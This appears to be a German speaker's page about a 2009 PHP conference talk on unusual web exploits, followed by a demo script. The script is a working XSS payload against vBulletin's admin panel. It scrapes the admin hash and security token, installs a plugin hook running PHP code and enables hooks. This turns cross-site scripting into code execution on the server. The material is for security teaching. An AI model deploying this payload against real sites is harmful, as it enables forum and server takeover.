Hier finden Sie die Präsentationen und weiterführende Informationen zu Vorträgen, die ich auf Konferenzen gehalten habe.
Vom 25. bis 27. Mai fand in Berlin die International PHP Conference 2009, Spring Edition, statt. Ich habe einen Vortag über eher unübliche Angriffe auf Webanwendungen gehalten: '"XSS-Schwachstelle kompromittiert Server" - Ungewöhnliche Exploits näher betrachtet'.
Beschreibung:
Manchmal haben Schwachstellen Auswirkungen, mit denen zumindest auf den
ersten Blick kaum jemand gerechnet hätte. Gerade das macht sie so
gefährlich, wenn ein Black Hat sie als erster findet. In dieser Session
werden einige ungewöhnliche Exploits vorgestellt, ihre Funktionsweise
analysiert und mögliche Gegenmaßnahmen beschrieben. Wären Ihre Anwendungen
vor solchen Angriffen sicher?
<script>
eval("
u='application/x-www-form-urlencoded';
c='Content-type';
d='Content-length';
reg=new XMLHttpRequest();
reg.open('GET', 'http://localhost/vB/upload/admincp/plugin.php?do=add', false);
reg.send(null);
r=reg.responseText;
t='http://localhost/vB/upload/admincp/plugin.php';
h='&adminhash='+r.substr(r.indexOf('hash\"')+13,32);
to='&securitytoken='+r.substr(r.indexOf('token\"')+14,40);
t2='product=vbulletin&hookname=forumhome_start&do=update&
title=foo&executionorder=1&phpcode=phpinfo();&active=1'+h+to;
r2=new XMLHttpRequest();
r2.open('POST', t, false);
r2.setRequestHeader(d,t2.length);
r2.setRequestHeader(c,u);
r2.send(t2);
t='http://localhost/vB/upload/admincp/options.php';
t2='do=dooptions&setting[enablehooks]=1'+h+to;
r2=new XMLHttpRequest();
r2.open('POST', t, false);
r2.setRequestHeader(d,t2.length);
r2.setRequestHeader(c,u);
r2.send(t2);
")
</script>